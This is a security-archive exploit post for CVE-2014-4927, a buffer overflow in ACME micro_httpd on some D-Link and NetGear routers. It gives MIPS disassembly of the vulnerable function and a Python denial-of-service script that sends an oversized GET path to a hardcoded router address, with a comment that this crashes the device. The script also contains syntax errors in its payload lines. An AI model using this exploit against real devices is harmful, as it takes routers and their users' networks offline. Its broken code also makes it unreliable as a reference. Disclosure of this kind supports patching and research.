exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ACME micro_httpd Denial Of Service

ACME micro_httpd Denial Of Service
Posted Jul 19, 2014
Authored by Yuval tisf Nativ

ACME micro_httpd suffers from a buffer overflow vulnerability that can cause a denial of service.

tags | exploit, denial of service, overflow
advisories | CVE-2014-4927
SHA-256 | 799722e898e8bbfd2e3eaa4766d76df5ff6396a95fe941a6775089d9bbe15173

ACME micro_httpd Denial Of Service

Change Mirror Download
"""
# Exploit Title: Buffer Overflow in micro_httpd by ACME
# Date: 4/7/2014
# Exploit Author: Yuval tisf Nativ
# Vendor Homepage: http://www.acme.com/software/micro_httpd/
# Software Link: http://www.acme.com/software/micro_httpd/
# Version: June 2012
# CVE: CVE-2014-4927
# Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)

Buffer Overflow in micro_httpd

Argument for GET method is vulnerable to a buffer overflow.
Analyzed on:
D-Link: DSL2750U, DSL2740U,
NetGear: WGR614, MR-ADSL-DG834

ACME Labs offer no version tracking on server versions so version might not
be accurate.

Disassmebly in MIPS of vulnerable flow:
sub_4067CC:

LOAD:004067CC
LOAD:004067CC lui $gp, 0x47
LOAD:004067D0 addiu $sp, -0xA0
LOAD:004067D4 li $gp, 0x46B850
LOAD:004067D8 sw $ra, 0xA0+var_4($sp)
LOAD:004067DC sw $s3, 0xA0+var_8($sp)
LOAD:004067E0 sw $s2, 0xA0+var_C($sp)
LOAD:004067E4 sw $s1, 0xA0+var_10($sp)
LOAD:004067E8 sw $s0, 0xA0+var_14($sp)
LOAD:004067EC sw $gp, 0xA0+var_88($sp)
LOAD:004067F0 lui $s0, 0x46
LOAD:004067F4 lw $v1, dword_464108
LOAD:004067F8 lw $t9, (off_463B24 - 0x46B850)($gp)
LOAD:004067FC move $v0, $a0
LOAD:00406800 sw $a1, 0xA0+var_90($sp)
LOAD:00406804 move $s2, $a2
LOAD:00406808 lui $a1, 0x44
LOAD:0040680C lui $a2, 0x44
LOAD:00406810 move $a0, $v1
LOAD:00406814 la $a1, aSDS # "%s %d %s\r\n"
LOAD:00406818 la $a2, aHttp1_1 # "HTTP/1.1"
LOAD:0040681C move $s1, $a3
LOAD:00406820 jalr $t9
LOAD:00406824 move $a3, $v0
LOAD:00406828 lw $gp, 0xA0+var_88($sp)
LOAD:0040682C lw $a0, dword_464108
LOAD:00406830 lw $t9, (off_463B24 - 0x46B850)($gp)
LOAD:00406834 lui $a2, 0x44
LOAD:00406838 lui $a1, 0x44
LOAD:0040683C la $a2, aMicro_httpd # "micro_httpd"
LOAD:00406840 jalr $t9
LOAD:00406844 la $a1, aServerS # "Server: %s\r\n"
LOAD:00406848 lw $gp, 0xA0+var_88($sp)
LOAD:0040684C lw $a1, 0x4108($s0)
LOAD:00406850 lw $t9, (off_463BCC - 0x46B850)($gp)
LOAD:00406854 lui $a0, 0x44
LOAD:00406858 jalr $t9
LOAD:0040685C la $a0, aCacheControlNo # "Cache-Control:
no-cache\r\n"
LOAD:00406860 lw $gp, 0xA0+var_88($sp)
LOAD:00406864 move $a0, $0
LOAD:00406868 lw $t9, (off_463CDC - 0x46B850)($gp)
LOAD:0040686C jalr $t9
LOAD:00406870 addiu $s3, $sp, 0xA0+var_7C
LOAD:00406874 lw $gp, 0xA0+var_88($sp)
LOAD:00406878 addiu $a0, $sp, 0xA0+var_80
LOAD:0040687C lw $t9, (off_463DF4 - 0x46B850)($gp)
LOAD:00406880 jalr $t9
LOAD:00406884 sw $v0, 0xA0+var_80($sp)
LOAD:00406888 lw $gp, 0xA0+var_88($sp)
LOAD:0040688C lui $a2, 0x44



Working Exploit for a Denial of Service:
"""

#!/bin/python
import socket
import struct

# This will crash the router.
# In some devices it takes about 10 minutes until functionality is
restored.

buffer = "\x41" * 6000 # Original fuzzing buffer.
host = "10.0.0.138"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))

payload = GET /" + buffer + " HTTP/1.1\r\n"
payload += ("Host: %s \r\n\r\n", % host)

s.send(payload)
s.close()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close